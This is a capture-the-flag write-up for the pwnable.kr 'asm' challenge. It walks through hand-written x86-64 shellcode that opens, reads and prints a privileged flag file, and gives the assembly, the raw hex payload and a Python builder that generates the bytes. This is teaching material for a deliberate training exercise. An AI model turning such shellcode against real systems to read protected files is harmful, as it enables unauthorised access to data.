
# 18 - asm

## The Challenge

Mommy! I think I know how to make shellcodes

ssh asm@pwnable.kr -p2222 (pw: guest)

## The Solution

The challenge directory contains a readme:

> once you connect to port 9026, the "asm" binary will be executed under asm_pwn privilege. make connection to challenge (nc 0 9026) then get the flag. (file name of the flag is same as the one in this directory)

The directory really does contain a file with an awfully long name.

It's time to run the binary:

![The last line and a half is my input, don't get confused :)](/files/-MIroJChVAf86Cx4jSq-)

Our input should be x64 shellcode that uses only `open`, `read` and `write` to print the flag. A peek at the source code shows there aren't any shenanigans; it's really what we need to do.

The source also contains a shellcode stub that our shellcode gets concatenated to. Let's [decode](https://defuse.ca/online-x86-assembler.htm#disassembly2) it:

![](/files/-MIrqJOInVmPc6lfX93y)

It zeros the registers. That's actually quite nice on pwnable's side, thanks ^_^

It's time to write some pure assembly! Using [this](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md) wonderful syscall table, we wrote assembly that opens the flag file, reads it and writes it to stdout.

```nasm
mov rax, 2              ; SYS_open; rsi (flags) is already 0 = O_RDONLY thanks to the zeroing stub
mov rdi, 0x4141406f     ; pointer to the file name appended after the shellcode
syscall
mov rdi, rax            ; fd returned by open
mov rax, 0              ; SYS_read
mov rsi, 0x4141406f     ; reuse the file-name location as the read buffer
mov rdx, 0x30           ; read up to 0x30 bytes
syscall
mov rax, 1              ; SYS_write; rsi/rdx still hold the buffer and its length
mov rdi, 1              ; stdout
syscall

; shellcode: \x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05
```

You may be asking yourself "what's that address that is assigned to rsi and rdi?" We concatenate the flag file name to the end of the shellcode, and that's its address. We also read the flag into the same location. The final shellcode:

```
\x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05\x25\x00\x00\x00\x00\x0F\x05\x74\x68\x69\x73\x5f\x69\x73\x5f\x70\x77\x6e\x61\x62\x6c\x65\x2e\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x66\x69\x6c\x65\x5f\x70\x6c\x65\x61\x73\x65\x5f\x72\x65\x61\x64\x5f\x74\x68\x69\x73\x5f\x66\x69\x6c\x65\x2e\x73\x6f\x72\x72\x79\x5f\x74\x68\x65\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x73\x5f\x76\x65\x72\x79\x5f\x6c\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x6e\x67\x00
```
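As an added illustration (not the author's code), this Python script assembles the same open/read/write sequence from the few x86-64 encodings it needs and derives the file-name pointer from the layout, so the address does not have to be hand-edited into the hex whenever the code or the stub changes. The map base and stub length used in the sample are assumed placeholder values, not taken from this page.

```python
import struct

# x86-64 register numbers for the ModRM byte (only the GPRs the shellcode uses).
REG = {"rax": 0, "rcx": 1, "rdx": 2, "rbx": 3, "rsp": 4, "rbp": 5, "rsi": 6, "rdi": 7}
SYSCALL = b"\x0f\x05"

def mov_imm(reg, imm):
    """mov <reg>, imm32: REX.W C7 /0 with a sign-extended 32-bit immediate."""
    if not -0x80000000 <= imm <= 0x7FFFFFFF:
        raise ValueError("immediate does not fit in imm32")
    return bytes([0x48, 0xC7, 0xC0 | REG[reg]]) + struct.pack("<i", imm)

def mov_reg(dst, src):
    """mov <dst>, <src>: REX.W 89 /r, ModRM = 0b11 | reg=src | rm=dst."""
    return bytes([0x48, 0x89, 0xC0 | (REG[src] << 3) | REG[dst]])

def build_shellcode(name_addr, read_len=0x30):
    """open(name, O_RDONLY) / read(fd, name, read_len) / write(1, name, read_len)."""
    return b"".join([
        mov_imm("rax", 2),          # SYS_open; rsi (flags) is 0 from the zeroing stub
        mov_imm("rdi", name_addr),  # path = the file name appended after the code
        SYSCALL,
        mov_reg("rdi", "rax"),      # fd returned by open
        mov_imm("rax", 0),          # SYS_read
        mov_imm("rsi", name_addr),  # reuse the name's memory as the read buffer
        mov_imm("rdx", read_len),
        SYSCALL,
        mov_imm("rax", 1),          # SYS_write; rsi/rdx are still the buffer and length
        mov_imm("rdi", 1),          # stdout
        SYSCALL,
    ])

def build_payload(base, stub_len, flag_name):
    """Derive the name pointer from the layout instead of hard-coding it.
    base = address the challenge maps the code at, stub_len = size of the
    register-zeroing stub in front of it (both assumed here, not from the page)."""
    size = len(build_shellcode(0))    # every imm32 has the same width, so size is fixed
    name_addr = base + stub_len + size
    return build_shellcode(name_addr) + flag_name.encode() + b"\x00", name_addr

if __name__ == "__main__":
    # Constructed sample layout; take the real values from the challenge source.
    data, addr = build_payload(0x41414000, 0x30, "flag_file_name_placeholder")
    print(hex(addr), data.hex())
```

Feeding the page's own address into `build_shellcode` reproduces the 58-byte hex string above exactly, which is a quick way to confirm the hand-assembled bytes.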
